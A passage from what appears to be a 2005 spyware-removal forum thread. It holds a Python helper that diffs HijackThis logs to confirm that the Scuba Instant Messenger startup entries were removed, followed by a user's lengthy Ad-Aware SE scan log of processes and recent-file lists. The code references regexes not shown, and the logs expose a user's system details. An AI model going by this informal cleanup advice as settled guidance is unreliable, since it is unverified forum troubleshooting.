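O4 - HKCU\..\RunOnce: [Scuba Instant Messenger] SINSTANTM.EXE
"""

AFTER = r"""Logfile of HijackThis v1.99.0
Scan saved at 2:25:11 AM, on 2/16/2005

Running processes:
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\r3proxy.exe
C:\Program Files\America Online 9.0a\waol.exe
C:\WINDOWS\system32\notepad.exe

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 10.1.3.1:8080
O4 - HKLM\..\Run: [Fellowes Proxy] C:\WINDOWS\system32\r3proxy.exe
O4 - HKCU\..\Run: [AOL Fast Start] "C:\Program Files\America Online 9.0a\AOL.EXE" -b
"""

# The two entries the helper asked to fix, copied from the reply above.
FIXED = [
    r"O4 - HKLM\..\Run: [Scuba Instant Messenger] SINSTANTM.EXE",
    r"O4 - HKCU\..\RunOnce: [Scuba Instant Messenger] SINSTANTM.EXE",
]


def _key(text):
    # Windows paths and registry names are case-insensitive.
    return re.sub(r"\s+", " ", text).lower()


def parse_hjt(text):
    """Split a HijackThis log into (running processes, [(code, body), ...])."""
    processes, entries, in_processes = [], [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.lower().startswith("running processes"):
            in_processes = True
            continue
        m = ENTRY_RE.match(line)
        if m:
            in_processes = False
            entries.append((m.group(1), m.group(2)))
        elif in_processes:
            processes.append(line)
    return processes, entries


def _only_in(first, second, key):
    seen = {key(x) for x in second}
    out = []
    for x in first:
        if key(x) not in seen and x not in out:
            out.append(x)
    return out


def diff_logs(before, after):
    """Report what disappeared and what appeared between two logs."""
    b_proc, b_ent = parse_hjt(before)
    a_proc, a_ent = parse_hjt(after)
    ekey = lambda e: (e[0], _key(e[1]))
    return {
        "removed_entries": _only_in(b_ent, a_ent, ekey),
        "added_entries": _only_in(a_ent, b_ent, ekey),
        "stopped_processes": _only_in(b_proc, a_proc, _key),
        "new_processes": _only_in(a_proc, b_proc, _key),
    }


def verify_fix(fixed_lines, log):
    """Return a list of problems; an empty list means the fix held."""
    procs, entries = parse_hjt(log)
    present = {(c, _key(b)) for c, b in entries}
    running = {p.rsplit("\\", 1)[-1].lower() for p in procs}
    problems = []
    for line in fixed_lines:
        m = ENTRY_RE.match(line.strip())
        if not m:
            problems.append("not a HijackThis entry: " + line)
            continue
        if (m.group(1), _key(m.group(2))) in present:
            problems.append("still registered: " + line.strip())
        cmd = O4_CMD_RE.search(m.group(2)) if m.group(1) == "O4" else None
        image = cmd.group(1).rsplit("\\", 1)[-1].lower() if cmd else None
        if image in running and "still running: " + image not in problems:
            problems.append("still running: " + image)
    return problems


if __name__ == "__main__":
    for name, items in diff_logs(BEFORE, AFTER).items():
        print(name, items)
    print("problems:", verify_fix(FIXED, AFTER))
```

Entries listed under `added_entries`, such as the `R1` proxy setting in the second log, are the ones to look at next, since they were not present when the first log was taken.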
  • edited February 2005
    **Cont'd from previous post**

    Ad-Aware SE Build 1.05
    Logfile Created on:Wednesday, February 16, 2005 12:39:32 AM
    Created with Ad-Aware SE Personal, free for private use.
    Using definitions file:SE1R27 05.02.2005
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

    References detected during the scan:
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
    MRU List(TAC index:0):28 total references
    Tracking Cookie(TAC index:3):13 total references
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

    Definition File:
    =========================
    Definitions File Loaded:
    Reference Number : SE1R27 05.02.2005
    Internal build : 32
    File location : C:\Program Files\Lavasoft\Ad-Aware SE Personal\defs.ref
    File size : 410347 Bytes
    Total size : 1296130 Bytes
    Signature data size : 1266439 Bytes
    Reference data size : 29179 Bytes
    Signatures total : 36032
    Fingerprints total : 616
    Fingerprints size : 23320 Bytes
    Target categories : 15
    Target families : 631


    Memory + processor status:
    ==========================
    Number of processors : 1
    Processor architecture : Non Intel
    Memory available:14 %
    Total physical memory:261040 kb
    Available physical memory:33960 kb
    Total page file size:640760 kb
    Available on page file:363660 kb
    Total virtual memory:2097024 kb
    Available virtual memory:2036332 kb
    OS:Microsoft Windows XP Professional Service Pack 2 (Build 2600)

    Ad-Aware SE Settings
    ===========================
    Set : Search for negligible risk entries
    Set : Safe mode (always request confirmation)
    Set : Scan active processes
    Set : Scan registry
    Set : Deep-scan registry
    Set : Scan my IE Favorites for banned URLs
    Set : Scan within archives
    Set : Scan my Hosts file

    Extended Ad-Aware SE Settings
    ===========================
    Set : Unload recognized processes & modules during scan
    Set : Scan registry for all users instead of current user only
    Set : Always try to unload modules before deletion
    Set : During removal, unload Explorer and IE if necessary
    Set : Let Windows remove files in use at next reboot
    Set : Delete quarantined objects after restoring
    Set : Include basic Ad-Aware settings in log file
    Set : Include additional Ad-Aware settings in log file
    Set : Include reference summary in log file
    Set : Include alternate data stream details in log file
    Set : Play sound at scan completion if scan locates critical objects


    2-16-2005 12:39:37 AM - Scan started. (Custom mode)

    Listing running processes
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

    #:1 [smss.exe]
    FilePath : \SystemRoot\System32\
    ProcessID : 856
    ThreadCreationTime : 2-15-2005 11:20:08 PM
    BasePriority : Normal


    #:2 [csrss.exe]
    FilePath : \??\C:\WINDOWS\system32\
    ProcessID : 932
    ThreadCreationTime : 2-15-2005 11:20:10 PM
    BasePriority : Normal


    #:3 [winlogon.exe]
    FilePath : \??\C:\WINDOWS\system32\
    ProcessID : 956
    ThreadCreationTime : 2-15-2005 11:20:12 PM
    BasePriority : High


    #:4 [services.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 1000
    ThreadCreationTime : 2-15-2005 11:20:13 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Services and Controller app
    InternalName : services.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : services.exe

    #:5 [lsass.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 1012
    ThreadCreationTime : 2-15-2005 11:20:13 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : LSA Shell (Export Version)
    InternalName : lsass.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : lsass.exe

    #:6 [ibmpmsvc.exe]
    FilePath : C:\WINDOWS\System32\
    ProcessID : 1176
    ThreadCreationTime : 2-15-2005 11:20:13 PM
    BasePriority : Normal


    #:7 [svchost.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 1252
    ThreadCreationTime : 2-15-2005 11:20:15 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Generic Host Process for Win32 Services
    InternalName : svchost.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : svchost.exe

    #:8 [svchost.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 1296
    ThreadCreationTime : 2-15-2005 11:20:16 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Generic Host Process for Win32 Services
    InternalName : svchost.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : svchost.exe

    #:9 [svchost.exe]
    FilePath : C:\WINDOWS\System32\
    ProcessID : 1332
    ThreadCreationTime : 2-15-2005 11:20:16 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Generic Host Process for Win32 Services
    InternalName : svchost.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : svchost.exe

    #:10 [s24evmon.exe]
    FilePath : C:\WINDOWS\System32\
    ProcessID : 1416
    ThreadCreationTime : 2-15-2005 11:20:17 PM
    BasePriority : Normal
    FileVersion : 3.1.8.0
    ProductVersion : 4.0.0.0
    ProductName : Mobile Unit Support Service
    CompanyName : Intel Corporation
    FileDescription : Event Monitor - Supports driver extensions to NIC Driver for wireless adapters.
    InternalName : S24EvMon
    LegalCopyright : Copyright © 2001 - 2003 Intel Corporation, 1997 - 2001 Symbol Technologies, Inc. Portions Copyright © MIT
    OriginalFilename : S24EvMon.exe

    #:11 [svchost.exe]
    FilePath : C:\WINDOWS\System32\
    ProcessID : 1568
    ThreadCreationTime : 2-15-2005 11:20:19 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Generic Host Process for Win32 Services
    InternalName : svchost.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : svchost.exe

    #:12 [svchost.exe]
    FilePath : C:\WINDOWS\System32\
    ProcessID : 1612
    ThreadCreationTime : 2-15-2005 11:20:19 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Generic Host Process for Win32 Services
    InternalName : svchost.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : svchost.exe

    #:13 [spoolsv.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 1908
    ThreadCreationTime : 2-15-2005 11:20:22 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Spooler SubSystem App
    InternalName : spoolsv.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : spoolsv.exe

    #:14 [aolacsd.exe]
    FilePath : C:\Program Files\Common Files\AOL\ACS\
    ProcessID : 412
    ThreadCreationTime : 2-15-2005 11:20:31 PM
    BasePriority : Normal
    FileVersion : 3.0.0.1
    ProductVersion : 3.0.0.1
    ProductName : AOL Connectivity Service
    CompanyName : America Online
    FileDescription : AOL Connectivity Service
    InternalName : AOLacsd
    LegalCopyright : Copyright © 2004 America Online
    OriginalFilename : AOLacsd.exe

    #:15 [aoltsmon.exe]
    FilePath : C:\Program Files\Common Files\AOL\TopSpeed\2.0\
    ProcessID : 428
    ThreadCreationTime : 2-15-2005 11:20:31 PM
    BasePriority : Normal
    FileVersion : 2, 0, 0, 0
    ProductVersion : 2, 0, 0, 0
    ProductName : AOL TopSpeed(TM) Monitor
    CompanyName : America Online, Inc
    FileDescription : AOL TopSpeed(TM) Monitor
    InternalName : AOL TopSpeed(TM) Monitor
    LegalCopyright : Copyright © 2004 America Online, Inc.
    OriginalFilename : aoltsmon.exe

    #:16 [ati2evxx.exe]
    FilePath : C:\WINDOWS\System32\
    ProcessID : 484
    ThreadCreationTime : 2-15-2005 11:20:31 PM
    BasePriority : Normal


    #:17 [kodakccs.exe]
    FilePath : C:\WINDOWS\system32\drivers\
    ProcessID : 516
    ThreadCreationTime : 2-15-2005 11:20:31 PM
    BasePriority : Normal
    FileVersion : 1.1.5100.0
    ProductVersion : 4.3.3.1
    ProductName : Kodak DC File System Driver (Win32)
    CompanyName : Eastman Kodak Company
    FileDescription : Kodak DC Ring 3 Conduit (Win32)
    InternalName : KodakCCS.exe
    LegalCopyright : Copyright (C) Eastman Kodak Co. 2000-2004
    OriginalFilename : DcFsSvc.exe

    #:18 [aoltpspd.exe]
    FilePath : C:\Program Files\Common Files\AOL\TopSpeed\2.0\
    ProcessID : 528
    ThreadCreationTime : 2-15-2005 11:20:31 PM
    BasePriority : Normal
    FileVersion : 2, 0, 0, 0
    ProductVersion : 2, 0, 0, 0
    ProductName : AOL TopSpeed(TM)
    CompanyName : America Online Inc
    FileDescription : AOL TopSpeed(TM)
    InternalName : AOL TopSpeed(TM) Loader
    LegalCopyright : Copyright © 2003-2004
    LegalTrademarks : AOL TopSpeed(TM)
    OriginalFilename : aoltpspd.exe

    #:19 [mcvsrte.exe]
    FilePath : c:\PROGRA~1\mcafee.com\vso\
    ProcessID : 568
    ThreadCreationTime : 2-15-2005 11:20:31 PM
    BasePriority : Normal
    FileVersion : 8, 0, 0, 12
    ProductVersion : 8, 0, 0, 0
    ProductName : McAfee VirusScan
    CompanyName : Networks Associates Technology, Inc
    FileDescription : McAfee VirusScan Real-time Engine
    InternalName : mcvsrte
    LegalCopyright : Copyright © 1998-2003 Networks Associates Technology, Inc
    OriginalFilename : mcvsrte.exe
    Comments : McAfee VirusScan Real-time Engine

    #:20 [mdm.exe]
    FilePath : C:\Program Files\Common Files\Microsoft Shared\VS7Debug\
    ProcessID : 584
    ThreadCreationTime : 2-15-2005 11:20:31 PM
    BasePriority : Normal
    FileVersion : 7.10.3077
    ProductVersion : 7.10.3077
    ProductName : Microsoft® Visual Studio .NET
    CompanyName : Microsoft Corporation
    FileDescription : Machine Debug Manager
    InternalName : mdm.exe
    LegalCopyright : Copyright© Microsoft Corporation. All rights reserved.
    OriginalFilename : mdm.exe

    #:21 [qconsvc.exe]
    FilePath : C:\WINDOWS\System32\
    ProcessID : 672
    ThreadCreationTime : 2-15-2005 11:20:32 PM
    BasePriority : Normal


    #:22 [regsrvc.exe]
    FilePath : C:\WINDOWS\System32\
    ProcessID : 732
    ThreadCreationTime : 2-15-2005 11:20:32 PM
    BasePriority : Normal
    FileVersion : 4, 0, 0, 1
    ProductVersion : 4, 0, 0, 1
    ProductName : RegSrvc Module
    CompanyName : Intel Corporation
    FileDescription : RegSrvc Module
    InternalName : RegSrvc
    LegalCopyright : Copyright © 2002 - 2003 Intel Corporation
    OriginalFilename : RegSrvc.EXE

    #:23 [scsiaccess.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 772
    ThreadCreationTime : 2-15-2005 11:20:32 PM
    BasePriority : Normal


    #:24 [tpkmpsvc.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 820
    ThreadCreationTime : 2-15-2005 11:20:32 PM
    BasePriority : Normal


    #:25 [wanmpsvc.exe]
    FilePath : C:\WINDOWS\
    ProcessID : 872
    ThreadCreationTime : 2-15-2005 11:20:32 PM
    BasePriority : Normal
    FileVersion : 9, 0, 0, 0
    ProductVersion : 9, 0, 0, 0
    ProductName : America Online
    CompanyName : America Online, Inc.
    FileDescription : Wan Miniport (ATW) Service
    InternalName : WanMPSvc
    LegalCopyright : Copyright © 2001 America Online, Inc.
    OriginalFilename : WanMPSvc.exe

    #:26 [mcshield.exe]
    FilePath : c:\PROGRA~1\mcafee.com\vso\
    ProcessID : 1440
    ThreadCreationTime : 2-15-2005 11:20:33 PM
    BasePriority : High


    #:27 [alg.exe]
    FilePath : C:\WINDOWS\System32\
    ProcessID : 1732
    ThreadCreationTime : 2-15-2005 11:20:35 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Application Layer Gateway Service
    InternalName : ALG.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : ALG.exe

    #:28 [explorer.exe]
    FilePath : C:\WINDOWS\
    ProcessID : 1576
    ThreadCreationTime : 2-15-2005 11:20:53 PM
    BasePriority : Normal
    FileVersion : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 6.00.2900.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Windows Explorer
    InternalName : explorer
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : EXPLORER.EXE

    #:29 [syntplpr.exe]
    FilePath : C:\Program Files\Synaptics\SynTP\
    ProcessID : 2076
    ThreadCreationTime : 2-15-2005 11:20:57 PM
    BasePriority : Normal
    FileVersion : 7.5.17.5 31Jul03
    ProductVersion : 7.5.17.5 31Jul03
    ProductName : Progressive Touch
    CompanyName : Synaptics, Inc.
    FileDescription : TouchPad Driver Helper Application
    InternalName : SynTPLpr
    LegalCopyright : Copyright (C) Synaptics, Inc. 1996-2003
    OriginalFilename : SynTPLpr.exe

    #:30 [syntpenh.exe]
    FilePath : C:\Program Files\Synaptics\SynTP\
    ProcessID : 2156
    ThreadCreationTime : 2-15-2005 11:20:57 PM
    BasePriority : Normal
    FileVersion : 7.5.17.5 31Jul03
    ProductVersion : 7.5.17.5 31Jul03
    ProductName : Progressive Touch
    CompanyName : Synaptics, Inc.
    FileDescription : Synaptics TouchPad Enhancements
    InternalName : Scrolleroo
    LegalCopyright : Copyright (C) Synaptics, Inc. 1996-2003
    OriginalFilename : SynTPEnh.exe

    #:31 [tphkmgr.exe]
    FilePath : C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\
    ProcessID : 2184
    ThreadCreationTime : 2-15-2005 11:20:57 PM
    BasePriority : Normal


    #:32 [rundll32.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 2204
    ThreadCreationTime : 2-15-2005 11:20:58 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : Run a DLL as an App
    InternalName : rundll
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : RUNDLL.EXE

    #:33 [tp98tray.exe]
    FilePath : C:\PROGRA~1\ThinkPad\UTILIT~1\
    ProcessID : 2236
    ThreadCreationTime : 2-15-2005 11:20:58 PM
    BasePriority : Normal
    FileVersion : 1, 0, 0, 0
    ProductVersion : 1, 0, 0, 0
    ProductName : IBM ThinkPad Tray Utility
    CompanyName : IBM Corp.
    FileDescription : IBM ThinkPad Tray Utility
    InternalName : IBM ThinkPad Tray Utility
    LegalCopyright : Copyright (C) IBM Corp. 1998,2002.
    OriginalFilename : Tp98Tray.exe

    #:34 [qcwlicon.exe]
    FilePath : C:\Program Files\ThinkPad\ConnectUtilities\
    ProcessID : 2264
    ThreadCreationTime : 2-15-2005 11:20:58 PM
    BasePriority : Normal


    #:35 [tponscr.exe]
    FilePath : C:\Program Files\ThinkPad\PkgMgr\HOTKEY\
    ProcessID : 2360
    ThreadCreationTime : 2-15-2005 11:21:00 PM
    BasePriority : Normal


    #:36 [tpscrex.exe]
    FilePath : C:\Program Files\ThinkPad\PkgMgr\HOTKEY_1\
    ProcessID : 2384
    ThreadCreationTime : 2-15-2005 11:21:00 PM
    BasePriority : Normal
    FileVersion : 1.06
    ProductVersion : 1.06
    ProductName : ThinkPad UltraZoom
    CompanyName : IBM Corporation
    FileDescription : ThinkPad UltraZoom
    InternalName : TPSCREX
    LegalCopyright : Copyright (c) 2000, IBM Corporation
    OriginalFilename : TpScrEx.exe

    #:37 [npdtray.exe]
    FilePath : C:\PROGRA~1\ThinkPad\UTILIT~1\
    ProcessID : 2624
    ThreadCreationTime : 2-15-2005 11:21:04 PM
    BasePriority : Normal
    FileVersion : 1, 0, 0, 0
    ProductVersion : 1, 0, 0, 0
    ProductName : IBM ThinkPad Utility
    CompanyName : IBM Corp.
    FileDescription : IBM ThinkPad Presentation Director Tray Utility
    InternalName : IBM ThinkPad Presentation Director Tray Utility
    LegalCopyright : Copyright (C) IBM Corp. 2000,2002
    OriginalFilename : NPDTray.EXE

    #:38 [ezejmnap.exe]
    FilePath : C:\PROGRA~1\ThinkPad\UTILIT~1\
    ProcessID : 2652
    ThreadCreationTime : 2-15-2005 11:21:05 PM
    BasePriority : Normal
    FileVersion : 1, 0, 0, 0
    ProductVersion : 1, 0, 0, 0
    ProductName : IBM ThinkPad EasyEject Support Application
    CompanyName : IBM Corp.
    FileDescription : IBM ThinkPad EasyEject Support Application
    InternalName : IBM ThinkPad EasyEject Support Application
    LegalCopyright : Copyright (C) IBM Corp., 2002.
    OriginalFilename : EzEjMnAp.EXE

    #:39 [r3proxy.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 2692
    ThreadCreationTime : 2-15-2005 11:21:06 PM
    BasePriority : Normal
    FileVersion : 2.1.0.2
    ProductVersion : 2.1.0.2
    ProductName : Fellowes EasyPoint Mouse Software
    CompanyName : Fellowes, Inc.
    FileDescription : Fellowes EasyPoint Proxy Server
    InternalName : R3Proxy.exe
    LegalCopyright : Copyright© Fellowes, Inc. 2002-2004
    OriginalFilename : R3Proxy.exe

    #:40 [aoldial.exe]
    FilePath : C:\Program Files\Common Files\AOL\ACS\
    ProcessID : 2708
    ThreadCreationTime : 2-15-2005 11:21:06 PM
    BasePriority : Normal
    FileVersion : 3.0.0.1
    ProductVersion : 3.0.0.1
    ProductName : AOL Connectivity Service
    CompanyName : America Online
    FileDescription : AOL Connectivity Service Dialer
    InternalName : AOLdial
    LegalCopyright : Copyright © 2004 America Online
    OriginalFilename : AOLdial.exe

    #:41 [aolsp scheduler.exe]
    FilePath : C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\
    ProcessID : 2716
    ThreadCreationTime : 2-15-2005 11:21:07 PM
    BasePriority : Normal
    FileVersion : 1, 0, 0, 74
    ProductVersion : 1, 0, 0, 74
    ProductName : AOLSP Scheduler
    FileDescription : AOLSP Scheduler
    InternalName : AOLSP Scheduler
    LegalCopyright : Copyright (C) America Online, Inc. 2004
    OriginalFilename : AOLSP Scheduler.exe

    #:42 [mcvsshld.exe]
    FilePath : C:\PROGRA~1\mcafee.com\vso\
    ProcessID : 2732
    ThreadCreationTime : 2-15-2005 11:21:08 PM
    BasePriority : Normal
    FileVersion : 8, 0, 0, 15
    ProductVersion : 8, 0, 0, 0
    ProductName : McAfee VirusScan
    CompanyName : Networks Associates Technology, Inc
    FileDescription : McAfee VirusScan ActiveShield Resource
    InternalName : msvcshld
    LegalCopyright : Copyright © 1998-2003 Networks Associates Technology, Inc
    OriginalFilename : mcvsshld.exe
    Comments : McAfee VirusScan ActiveShield Resource

    #:43 [mcagent.exe]
    FilePath : C:\PROGRA~1\mcafee.com\agent\
    ProcessID : 2780
    ThreadCreationTime : 2-15-2005 11:21:09 PM
    BasePriority : Normal
    FileVersion : 4, 3, 0, 10
    ProductVersion : 4, 3, 0, 0
    ProductName : McAfee SecurityCenter
    CompanyName : Networks Associates Technology, Inc
    FileDescription : McAfee SecurityCenter Agent
    InternalName : mcagent
    LegalCopyright : Copyright © 1998-2002 Networks Associates Technology, Inc.
    OriginalFilename : mcagent.exe

    #:44 [mcvsescn.exe]
    FilePath : c:\progra~1\mcafee.com\vso\
    ProcessID : 2828
    ThreadCreationTime : 2-15-2005 11:21:10 PM
    BasePriority : Normal
    FileVersion : 8, 0, 0, 30
    ProductVersion : 8, 0, 0, 0
    ProductName : McAfee VirusScan
    CompanyName : Networks Associates Technology, Inc
    FileDescription : McAfee VirusScan E-mail Scan Module
    InternalName : mcvsescn
    LegalCopyright : Copyright © 1998-2003 Networks Associates Technology, Inc
    OriginalFilename : mcvsescn.EXE
    Comments : McAfee VirusScan E-mail Scan Module

    #:45 [ibmmessages.exe]
    FilePath : C:\Program Files\IBM\Messages By IBM\
    ProcessID : 2972
    ThreadCreationTime : 2-15-2005 11:21:13 PM
    BasePriority : Normal


    #:46 [jusched.exe]
    FilePath : C:\Program Files\Java\j2re1.4.2_06\bin\
    ProcessID : 2980
    ThreadCreationTime : 2-15-2005 11:21:14 PM
    BasePriority : Normal


    #:47 [aolhos~1.exe]
    FilePath : C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\
    ProcessID : 3140
    ThreadCreationTime : 2-15-2005 11:21:17 PM
    BasePriority : Normal
    FileVersion : 1.0.0.6
    ProductVersion : 1.0.0.6
    ProductName : AOL Service Libraries
    CompanyName : America Online, Inc.
    FileDescription : AOLHostManager Service
    InternalName : AOLHostManager
    LegalCopyright : © 2004 America Online, Inc.
    OriginalFilename : AOLHostManager.exe

    #:48 [realplay.exe]
    FilePath : C:\Program Files\Real\RealPlayer\
    ProcessID : 3148
    ThreadCreationTime : 2-15-2005 11:21:17 PM
    BasePriority : Normal
    FileVersion : 6.0.9.584
    ProductVersion : 6.0.9.584
    ProductName : RealPlayer (32-bit)
    CompanyName : RealNetworks, Inc.
    FileDescription : RealPlayer
    InternalName : REALPLAY
    LegalCopyright : Copyright © RealNetworks, Inc. 1995-2000
    LegalTrademarks : RealAudio(tm) is a trademark of RealNetworks, Inc.
    OriginalFilename : REALPLAY.EXE

    #:49 [sinstantm.exe]
    FilePath : C:\WINDOWS\system32\
    ProcessID : 3772
    ThreadCreationTime : 2-15-2005 11:21:35 PM
    BasePriority : Normal


    #:50 [aolservicehost.exe]
    FilePath : C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\
    ProcessID : 3796
    ThreadCreationTime : 2-15-2005 11:21:35 PM
    BasePriority : Normal
    FileVersion : 1.0.0.6
    ProductVersion : 1.0.0.6
    ProductName : AOL Service Libraries
    CompanyName : America Online, Inc.
    FileDescription : AOLServiceHost Service
    InternalName : AOLServiceHost
    LegalCopyright : © 2004 America Online, Inc.
    OriginalFilename : AOLServiceHost.exe

    #:51 [wmiprvse.exe]
    FilePath : C:\WINDOWS\System32\wbem\
    ProcessID : 3440
    ThreadCreationTime : 2-15-2005 11:22:07 PM
    BasePriority : Normal
    FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    ProductVersion : 5.1.2600.2180
    ProductName : Microsoft® Windows® Operating System
    CompanyName : Microsoft Corporation
    FileDescription : WMI
    InternalName : Wmiprvse.exe
    LegalCopyright : © Microsoft Corporation. All rights reserved.
    OriginalFilename : Wmiprvse.exe

    #:52 [ad-aware.exe]
    FilePath : C:\Program Files\Lavasoft\Ad-Aware SE Personal\
    ProcessID : 2940
    ThreadCreationTime : 2-16-2005 6:30:02 AM
    BasePriority : Normal
    FileVersion : 6.2.0.206
    ProductVersion : VI.Second Edition
    ProductName : Lavasoft Ad-Aware SE
    CompanyName : Lavasoft Sweden
    FileDescription : Ad-Aware SE Core application
    InternalName : Ad-Aware.exe
    LegalCopyright : Copyright © Lavasoft Sweden
    OriginalFilename : Ad-Aware.exe
    Comments : All Rights Reserved

    #:53 [waol.exe]
    FilePath : C:\Program Files\America Online 9.0a\
    ProcessID : 2808
    ThreadCreationTime : 2-16-2005 6:39:24 AM
    BasePriority : Idle

    Memory scan result:
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
    New critical objects: 0
    Objects found so far: 0

    Started registry scan
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

    Registry Scan result:
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
    New critical objects: 0
    Objects found so far: 0

    Started deep registry scan
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

    Deep registry scan result:
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
    New critical objects: 0
    Objects found so far: 0

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\applets\wordpad\recent file list
    Description : list of recent files opened using wordpad

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\applets\paint\recent file list
    Description : list of files recently opened using microsoft paint

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\explorer\runmru
    Description : mru list for items opened in start | run

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\search assistant\acmru
    Description : list of recent search terms used with the search assistant

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\explorer\comdlg32\opensavemru
    Description : list of recently saved files, stored according to file extension

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\explorer\comdlg32\lastvisitedmru
    Description : list of recent programs opened

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\explorer\recentdocs
    Description : list of recent documents opened

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\terminal server client\default
    Description : list of recent systems connected to using remote desktop / terminal services

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\powerpoint\recent file list
    Description : list of recent files used by microsoft powerpoint

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\common\open find\microsoft office word\settings\save as\file name mru
    Description : list of recent documents saved by microsoft word

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\publisher\recent file list
    Description : list of recent files used by microsoft publisher

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\access\settings
    Description : list of recently opened documents in microsoft access

    MRU List Object Recognized!
